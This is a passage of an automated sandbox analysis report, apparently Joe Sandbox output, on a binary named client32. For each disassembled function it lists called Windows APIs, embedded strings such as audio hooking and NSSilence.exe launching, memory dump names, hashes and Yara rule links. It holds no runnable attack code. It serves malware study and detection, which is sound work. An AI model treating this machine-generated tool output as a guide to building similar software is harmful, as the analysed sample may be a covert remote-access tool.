                                                                                                                                    • API ID: Process$OpenWindow$CloseFindHandleThreadToken
                                                                                                                                    • String ID: *ShellWndClass$..\ctl32\WMM.CPP$Client$Progman$hProcess
                                                                                                                                    • API String ID: 2107570828-3172847105
                                                                                                                                    • Opcode ID: f886ccfc3192bfaf420af4aa370e7031911a49e079f915bb3e5fa6d37c23fcda
                                                                                                                                    • Instruction ID: 35e4e3a9229791c392b329ddf425869299b64210071ac9bc9274d0e225f0a412
                                                                                                                                    • Opcode Fuzzy Hash: f886ccfc3192bfaf420af4aa370e7031911a49e079f915bb3e5fa6d37c23fcda
                                                                                                                                    • Instruction Fuzzy Hash: DA21B275E41228ABDB44DFE08D85FEEF7B8EB49718F004069E925B7240EB70A900C7A5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110711C0 Relevance: 16.8, APIs: 4, Strings: 7, Instructions: 285COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                      • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                                    • wsprintfA.USER32 ref: 11071385
                                                                                                                                    • wsprintfA.USER32 ref: 110713FD
                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                    Strings
                                                                                                                                    • Warning. Bigneasy can't alloc %u, xrefs: 11071292
                                                                                                                                    • ..\ctl32\Connect.cpp, xrefs: 11071427
                                                                                                                                    • Error: %s, xrefs: 110714D4
                                                                                                                                    • pEntry->sofar (%d) != pEntry->totlen (%d), uid=%u, pEntry=%xbigdata(%x)=%s, xrefs: 110714C1
                                                                                                                                    • too much data, biguid=%u, thislen=%d, sofar=%d, totlen=%d, more=%d, excess=%d, allzero=%d, Excess: %s, xrefs: 110713F7
                                                                                                                                    • Error: ignored last bigneasy data without earlier data (biguid=%d), xrefs: 11071263
                                                                                                                                    • %02x , xrefs: 1107137F, 11071490
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: wsprintf$Heap$AllocateErrorFreeLast
                                                                                                                                    • String ID: %02x $..\ctl32\Connect.cpp$Error: %s$Error: ignored last bigneasy data without earlier data (biguid=%d)$Warning. Bigneasy can't alloc %u$pEntry->sofar (%d) != pEntry->totlen (%d), uid=%u, pEntry=%xbigdata(%x)=%s$too much data, biguid=%u, thislen=%d, sofar=%d, totlen=%d, more=%d, excess=%d, allzero=%d, Excess: %s
                                                                                                                                    • API String ID: 2102778827-3174212670
                                                                                                                                    • Opcode ID: c815207cccc139855427ef7e1a8741b45eb789218fc61619bf997388c04534ed
                                                                                                                                    • Instruction ID: ea22814be30d160bcc6a6f2f34e81bedc3e4793a1547ddc51286dcf2c7d1f429
                                                                                                                                    • Opcode Fuzzy Hash: c815207cccc139855427ef7e1a8741b45eb789218fc61619bf997388c04534ed
                                                                                                                                    • Instruction Fuzzy Hash: A8B18375E0521A9FDB24CF69CC84B9AF7F9BF44304F1085E9E48997280EB71AA84CF54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1100B870 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 149COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetOverlappedResult.KERNEL32(?,20F29557,FFFFFFFF,00000001), ref: 1100B8BC
                                                                                                                                    • GetLastError.KERNEL32 ref: 1100B8C6
                                                                                                                                    • GetTickCount.KERNEL32 ref: 1100B929
                                                                                                                                    • wsprintfA.USER32 ref: 1100B966
                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1100BA1F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
                                                                                                                                    • String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
                                                                                                                                    • API String ID: 3598861413-432254317
                                                                                                                                    • Opcode ID: 4d8ccca68772371beae9765a05ae04c1519a56a32be935604de69499ee4f6c87
                                                                                                                                    • Instruction ID: 18c60078330076d4e9d4cf7e90cd241f5a56869eb84b7316cdfab9231a576d1f
                                                                                                                                    • Opcode Fuzzy Hash: 4d8ccca68772371beae9765a05ae04c1519a56a32be935604de69499ee4f6c87
                                                                                                                                    • Instruction Fuzzy Hash: 7351D1B8900A1AABE710CFA5CC84ABBF7F8EF49709F004519F56697281E7747980C7B5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11016766 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 142windowlibraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                    • GetDlgItem.USER32 ref: 110167D3
                                                                                                                                    • SendMessageA.USER32(?,00001037,00000000,00000000), ref: 11016826
                                                                                                                                    • SendMessageA.USER32(?,00001036,00000000,00000000), ref: 11016839
                                                                                                                                    • LoadLibraryA.KERNEL32(User32.dll), ref: 1101687B
                                                                                                                                    • EnumWindows.USER32(Function_00016500,?), ref: 110168CF
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 110168E3
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 110168F0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Library$FreeMessageSend$EnumItemLoadWindowswsprintf
                                                                                                                                    • String ID: User32.dll$explorer
                                                                                                                                    • API String ID: 1329691242-2144398479
                                                                                                                                    • Opcode ID: 1d8f4eab773bd3c9209806cd1434e7e9acd8533a5096b2d6e95c8f780284203e
                                                                                                                                    • Instruction ID: 5c98bee146702e2cd439898128a11489aac44479a45911a971654e339293b8be
                                                                                                                                    • Opcode Fuzzy Hash: 1d8f4eab773bd3c9209806cd1434e7e9acd8533a5096b2d6e95c8f780284203e
                                                                                                                                    • Instruction Fuzzy Hash: BA5128B4E007089FDB14CFA9CC84A9EFBF9BF88704F10465AE515AB3A4D7B5A941CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11110980 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111synchronizationCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,20F29797,?,?,?,?,00000000,1118B2A8,000000FF,?,1100C84D), ref: 111109CA
                                                                                                                                    • EnterCriticalSection.KERNEL32 ref: 11110A15
                                                                                                                                    • SetEvent.KERNEL32(000002BC), ref: 11110A3E
                                                                                                                                    • CloseHandle.KERNEL32(000002BC), ref: 11110A72
                                                                                                                                    • WaitForSingleObject.KERNEL32(000002E4,000000FF), ref: 11110A80
                                                                                                                                    • CloseHandle.KERNEL32(000002E4), ref: 11110A8D
                                                                                                                                    • LeaveCriticalSection.KERNEL32(111F18F0), ref: 11110ACE
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$CloseHandle$DeleteEnterErrorEventExitLastLeaveMessageObjectProcessSingleWaitwsprintf
                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$idata->Q.size () == 0
                                                                                                                                    • API String ID: 3524385308-424854974
                                                                                                                                    • Opcode ID: 3ab4775df07796eed78fb873f16f2f7d94cc053ba5449c4ec50ba6328bf9a579
                                                                                                                                    • Instruction ID: cd3834a14b59d99cf45f83ddfab95b0c7a5b5c864ed52945fb0d8ef614f7dbf5
                                                                                                                                    • Opcode Fuzzy Hash: 3ab4775df07796eed78fb873f16f2f7d94cc053ba5449c4ec50ba6328bf9a579
                                                                                                                                    • Instruction Fuzzy Hash: 4C416D75E006669FD704DFE5DAD096AF7E9FB0A318F00463EE4259B748D731A844CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1100D690 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80processCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 110EE230: LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
                                                                                                                                      • Part of subcall function 110EE230: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
                                                                                                                                      • Part of subcall function 110EE230: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264
                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D6C7
                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D6E0
                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 1100D6FF
                                                                                                                                    • wsprintfA.USER32 ref: 1100D720
                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D769
                                                                                                                                    • CloseHandle.KERNEL32(?,00000000), ref: 1100D781
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1100D78A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleNamewsprintf
                                                                                                                                    • String ID: %sNSSilence.exe %u %u$D
                                                                                                                                    • API String ID: 3414582223-4146734959
                                                                                                                                    • Opcode ID: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
                                                                                                                                    • Instruction ID: dcc8dc743a74700e759132c866a45fb8d4aebb64c19cbf1f793f2e736b28f377
                                                                                                                                    • Opcode Fuzzy Hash: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
                                                                                                                                    • Instruction Fuzzy Hash: BB217675A812286FEB24DBE0CD49FDDB77C9B04704F104195F619A71C0DEB4AA44CF64
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11002620 Relevance: 15.2, APIs: 10, Instructions: 155COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Line$MoveObjectSelect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3849273610-0
                                                                                                                                    • Opcode ID: c53529f1dc4d7278c1e2bdfbc1d09de2f48358c96fcb55bf2390c852d8790959
                                                                                                                                    • Instruction ID: 60fc3701a2ff4533ab105798ae09397bcf1b6d79f9a4234bdec1028ad67aa090
                                                                                                                                    • Opcode Fuzzy Hash: c53529f1dc4d7278c1e2bdfbc1d09de2f48358c96fcb55bf2390c852d8790959
                                                                                                                                    • Instruction Fuzzy Hash: 23518E7590061EEFCB049FA5D9848AEFBBCFF48318F018459E96973254CB30A961CF60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111224E0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 245COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountTick
                                                                                                                                    • String ID: IgnoreAudioErr$NC_FULLSCREEN$Replay$ReplayAudio$_debug$s
                                                                                                                                    • API String ID: 536389180-1796175098
                                                                                                                                    • Opcode ID: ca6ba46c9015117fcc1517a67d3a293ab85737b6a33365b7d164b563f6c9f45b
                                                                                                                                    • Instruction ID: cb2900c279777de7545e560f999f6a77f6d793e64e0f37265b5f9b430f180949
                                                                                                                                    • Opcode Fuzzy Hash: ca6ba46c9015117fcc1517a67d3a293ab85737b6a33365b7d164b563f6c9f45b
                                                                                                                                    • Instruction Fuzzy Hash: 8B91D539A046169BCB10CF64CC80BDEF7B5EF55318FA44169E809AF245DB74AD41CBE2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111194B0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 153COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 11113040: GetClientRect.USER32 ref: 1111306A
                                                                                                                                    • GetWindowRect.USER32 ref: 111194E1
                                                                                                                                    • MapWindowPoints.USER32 ref: 111194FA
                                                                                                                                    • GetClientRect.USER32 ref: 11119508
                                                                                                                                    • GetScrollRange.USER32(?,00000000,?,?), ref: 11119549
                                                                                                                                    • GetSystemMetrics.USER32 ref: 11119559
                                                                                                                                    • GetScrollRange.USER32(?,00000001,?,00000000), ref: 1111956C
                                                                                                                                    • GetSystemMetrics.USER32 ref: 11119576
                                                                                                                                    Strings
                                                                                                                                    • GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 111195BC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
                                                                                                                                    • String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
                                                                                                                                    • API String ID: 4172599486-2052393828
                                                                                                                                    • Opcode ID: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
                                                                                                                                    • Instruction ID: 912fb1d3c2cdad7c34c8054a8beb9bd8394091149dbdaf68818a53be5a6566d8
                                                                                                                                    • Opcode Fuzzy Hash: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
                                                                                                                                    • Instruction Fuzzy Hash: E051F8B1900609AFDB14CFA8C980BEEFBF9FF88314F104569E526A7244D774A941CF60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11009740 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 148fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 110B7DF0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7E16
                                                                                                                                      • Part of subcall function 110B7DF0: GetProcAddress.KERNEL32(00000000), ref: 110B7E1D
                                                                                                                                      • Part of subcall function 110B7DF0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7E33
                                                                                                                                    • wsprintfA.USER32 ref: 1100977F
                                                                                                                                    • wsprintfA.USER32 ref: 11009799
                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009883
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
